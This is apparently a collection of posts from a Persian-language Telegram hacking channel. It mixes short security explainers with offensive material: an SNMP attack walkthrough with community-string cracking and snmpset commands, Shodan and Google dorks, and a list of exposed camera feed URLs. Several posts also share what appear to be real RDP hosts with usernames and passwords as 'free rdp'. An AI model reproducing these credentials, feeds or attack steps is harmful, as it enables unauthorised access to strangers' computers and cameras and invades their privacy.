چطوری فرم های آسیب پذیر برای حمله Blind XSS پیدا کنیم ؟ 🤔 🧐

1. اول وارد وب سایت https://dorkking.blindf.com میشیم ⚡️⌨️
2. دامنه هدف رو بدون "https://" وارد میکنیم ⚡️🌐
3. رو Next کلیک میکنیم ⚡️ ⚪️
4. هر 5 تا دورک برای پیدا کردن فرم ها طراحی شدن ⚡️ 😎

#آموزشی

| • چنل بلک کد💀•|


⚫️ @ir_blackcode

آموزش پروتکل SNMP و روش های نفوذ

🔹 SNMP چیست؟

SNMP (Simple Network Management Protocol)

پروتکلی در لایه Application است برای مدیریت و مانیتورینگ تجهیزات شبکه (روتر، سوئیچ، سرور...)

پورت‌ها: 161 (درخواست/پاسخ) ، 162 (Trap)

اجزا:

Manager (NMS): نرم‌افزار مدیریت

Agent: روی دستگاه نصب است

MIB: پایگاه داده شامل OID ها

نسخه‌ها:

v1 و v2c → ناامن (Community String ساده: public, private)

v3 → امن (رمزنگاری + احراز هویت)



---

🔹snmp مراحل تست نفوذ

1. شناسایی سرویس

nmap -sU -p 161 --script=snmp-info <IP>

→ گرفتن اطلاعات پایه (OS، اینترفیس‌ها، uptime).

2. cra__ck Community String

onesixtyone -c dict.txt <IP>

→ تست رشته‌های رایج مثل public و private.

3. استخراج اطلاعات (Enumeration)

snmpwalk -v2c -c public <IP>

→ نمایش جدول ARP، کاربران، Routing table و …

4. سوءاستفاده از دسترسی (Exploitation)

اگر Community String سطح Read-Write پیدا شود:

snmpset -v2c -c private <IP> <OID> type value

→ امکان تغییر پورت‌ها یا تنظیمات دستگاه.


5. SNMPv3
امن‌تر است، اما اگر رمز ساده باشد قابل Brute Force:

snmpwalk -v3 -u admin -a SHA -A pass -x AES -X key <IP>

#آموزشی
#آموزش پروتکل SNMP

| • چنل بلک کد 💀•|
🔹 @ir_blackcode

🔎 دُورک‌های SNMP در Shodan

🎯 پورت‌ها

port:161
port:162

→ پیدا کردن سیستم‌هایی که SNMP باز دارن.

---

🎯 پروتکل / سرویس

"SNMPv1"
"SNMPv2"
"SNMPv3"

→ فیلتر بر اساس نسخه SNMP.

---

🎯 ترکیب پورت + نسخه

port:161 "SNMPv2"
port:161 "SNMPv3"


---

🎯 فیلتر به کشور

port:161 country:IR
port:161 country:US


---

🎯 فیلتر به سازمان / ISP

port:161 org:"Cisco"
port:161 org:"Huawei"

---

🎯 مثال‌های ترکیبی

port:161 "public"
port:161 "private"

#دورک
#Dork
| • بلک کد 💀•|

🔹 @ir_blackcode

IP : 95.78.164.39:3389

USER : Бух1

PASS : 123QWEasd
__________________________👾
#free rdp

@ir_blackcode

IP : 81.200.30.101:3389

USER : alena

PASS : 1q2w3e4R
__________________________👾
#free rdp

@ir_blackcode

IP : 84.253.115.142:55338

USER : user1

PASS : 123456
__________________________👾
#free rdp

@ir_blackcode

💀Google Durk Camera💀

Dork : inurl:/cgi-bin/guestimage.html

http://37.182.240.202:81/cgi-bin/guestimage.html

http://77.89.48.24:89/cgi-bin/guestimage.html

http://221.189.0.181/cgi-bin/guestimage.html

http://166.149.155.73:7001/cgi-bin/guestimage.html

http://130.180.86.233:1010/cgi-bin/guestimage.html

https://178.237.152.29/cgi-bin/guestimage.html

http://2.234.120.231:91/cgi-bin/guestimage.html

http://166.151.100.208:7001/cgi-bin/guestimage.html

http://153.142.220.112/cgi-bin/guestimage.html

http://166.151.98.221:7001/cgi-bin/guestimage.html

https://185.5.169.35/cgi-bin/guestimage.html

http://109.90.6.242/cgi-bin/guestimage.html

http://213.98.123.127:8050/cgi-bin/guestimage.html

http://77.145.244.11:83/cgi-bin/guestimage.html

http://89.106.143.18:122/cgi-bin/guestimage.html

.| بلک کد |.
@ir_blackcode

IP : 198.54.129.116:3389

USER : Administrator

PASS : 123456
__________________________👾
#free rdp

@ir_blackcode

📺 تکنیک Session Hijacking 📺

دقیقاً همون داستان کوکی و توکنه. هکر کوکی مرورگرتو برمی‌داره → میره با همون وارد حسابت میشه.

📺 تکنیک Malicious Extensions 📺

یه افزونه مثلاً برای دانلود ویدیو از یوتیوب می‌زنه → تو نصب می‌کنی → پشت پرده همه رمزها و کوکیاتو می‌فرسته براش.

📺 تکنیک Phishing + Browser Exploit 📺

یه لینک برات می‌فرستن (مثلاً لاگین بانکت) → تو باز می‌کنی → یه باگ مرورگر یا یه اسکریپت اجرا میشه → دیتا از مرورگرت کشیده میشه بیرون.

📺 تکنیک Browser Sync Attack (حمله به سینک مرورگر) 📺

اگه تو Chrome یا Edge گزینه‌ی Sync فعاله → دیتات (پسورد، کوکی، تاریخچه) تو کلوده. هکر به اکانتت دسترسی بگیره → همه‌چی دستشه.

اینا فقط یسری از این نوع حملات هستن همه چی به خلاقیت خود هکر بر میگرده اولین قدم هک خلاقیت شماس ! 🖥

.|بلک کد|.
🏴‍☠️
@ir_blackcode

راه های تکثیر ویروس چیست؟ معرفی 3 روش تکثیر ویروس

💻☠️

کثیر از طریق رسانه ها : منظور از رسانه ها رادیو و تلوزیون و اینترنت نیست ، منظور ما Physical Media یا رسانه های فیزیکی مثل CD و DVD و Flash Memory ها و هارد دیسک های اکسترنال و بصورت کلی هر وسیله ای که حافظه دارد است . حتی دوربین شما هم ممکن است باعث انتشار ویروس شود. این روش یکی از موثرترین روش های تکثیر اکثر ویروس ها است و به محض اینکه شما یکی از این رسانه ها را به یک سیستم متصل کنید و در صورتیکه قابل نوشتن باشد بلافاصله ویروس آنرا تشخیص داده و به داخل آن می رود تا به کامپیوتر دیگر منتقل شود.

👾👾

تکثیر از طریق ایمیل و شبکه های اجتماعی و پیام رسان ها : یکی از بهترین روش های انتقال ویروس از طریق فایل ، انتقال از طریق شبکه های اجتماعی و پیامرسان هاست ، ویروس براحتی خودش را در قالب یک پیام از طرف شما برای دوستان شما ارسال می کند و خودش را یک پیام از طرف یک دوست معرفی می کند و دوستان شما را تحریک به کلیک کردن یا دانلود و نصب فایل ویروسی می کنند. در عین حال دسترسی پیدا کردن به لیست ایمیل دوستان و ارسال شدن توسط ابزارهای ارسال ایمیل مثل Outlook یکی دیگر از روش های مرسوم انتقال ویروس است

🤖👾

تکثیر از طریق شبکه های اشتراک فایل Peer to Peer : شبکه های اشتراک فایل Peer To Peer یکی از خطرناک ترین محیط ها برای کاربران اینترنتی است و به دلیل عدم وجود هرگونه نظارت بر روی محتوای آنها و به اشتراک گذاری قسمتی از هارد دیسک شما در این شبکه ها ، ویروس ها بستری امن برای انتقال پیدا می کنند. از جمله معروف ترین این شبکه ها می توان به شبکه های تورنت ( Torrent ) و ابزارهایی مثل Emule و Kaazaa اشاره کرد.

.|چنل بلک کد|.
@ir_blackcode

برای Bypass آپلودر ها از این پسوند ها استفاده کنید

|چنل بلک کد😈|

○| @ir_blackcode |○

سلام به همه بچه های بلک کد
خیلی مخلصیم
اقا ما یه اسیب پذیری xss از یه سایتی زدیم که رفتیم بهشون گزارش کردیم گفتن برامون مهم نیست خلاصه که فرهنگ باگ بانتی هنوز تو ایران جا نیوفتاده و الکی فقط وقت ادم میره😕

همین دیگه ...
اها راستی از یه سایت دیگه هم باگ زدم برای گزارش اونم میرم ببینم چی میشه خبرشو براتون میزارم
ایشالا به بانتی میرسیم😂

چنل بلک کد📌
@ir_blackcode

سلام به همه رفقای چنل امیدوارم حالتون عالی باشه
آقا ما به این سایت هم پیام دادیم ولی گفتن که برنامه ای برای باگ بانتی ندارن

مطالب و آموزش های خفن دیگه تو راهه...

|☠️چنل بلک کد☠️|
@ir_blackcode

روز برنامه‌نویس مبارک ! 🎉

|از طرف تیم بلک کد❤️😊|
🔜 @ir_blackcode

پخش زنده شبکه اینترنشنال هک شد

توسط گروه هکری حنظله

@ir_blackcode

5 سیستم عامل مناسب امنیت سایبری

☠️& @ir_blackcode &☠️

Certificate Pinning چیست؟

یک تکنیک امنیتی است که در واقع بین کلاینت و سرور قرار میگیرد. به عبارت دیگر یک مکانیسم امنیتی است که در زمینه احراز هویت اتصالات Client و سرور در زمینه ارتباط امن از طریق HTTPS یا سایر پروتکل‌های TLS استفاده می‌شود. حمله سال 2011 به DigiNotar که یک شرکت صدور گواهینامه دیجیتال بود نشان داد حتی با وجود گواهینامه مجرمان سایبری می‌توانند راه‌هایی برای نفوذ به سیستم‌ها و صدور گواهی‌های SSL تقلبی بیابند.



💀◾️ @ir_blackcode

حمله ARP Poisoning چیست ؟

حمله ARP Poisoning یکی از تهدیدات جدی در شبکه‌های کامپیوتری است که می‌تواند به امنیت داده‌ها و حریم خصوصی کاربران آسیب برساند. این حمله از طریق دستکاری جدول ARP Cache و هدایت نادرست ترافیک شبکه به سمت مهاجم، امکان شنود و تغییر داده‌ها را فراهم می‌کند. برای مقابله با این نوع حملات، استفاده از روش‌های امنیتی مانند Static ARP Entries، Dynamic ARP Inspection و ابزارهای امنیتی مانند فایروال‌ها و سیستم‌های تشخیص نفوذ ضروری است. آگاهی و اقدامات پیشگیرانه می‌توانند به حفظ امنیت شبکه و محافظت از داده‌ها کمک کنند. در نهایت، درک صحیح از چگونگی عملکرد پروتکل ARP و شناخت تهدیدات مرتبط با آن، اولین گام برای ایجاد یک محیط شبکه امن و مطمئن است.

📎 @ir_blackcode

اگه میخواید ببینید اطلاعاتی ازتون لو رفته میتونید از سایت زیر استعلام بگیرید

leakfa.com

💻 @ir_blackcode

Hacked WordPress sites

☠️Blackcode Team☠️

▪️ @ir_blackcode

چند تا از بهترین ابزار ها برای جمع آوری اطلاعات

○بلک کد○
@ir_blackcode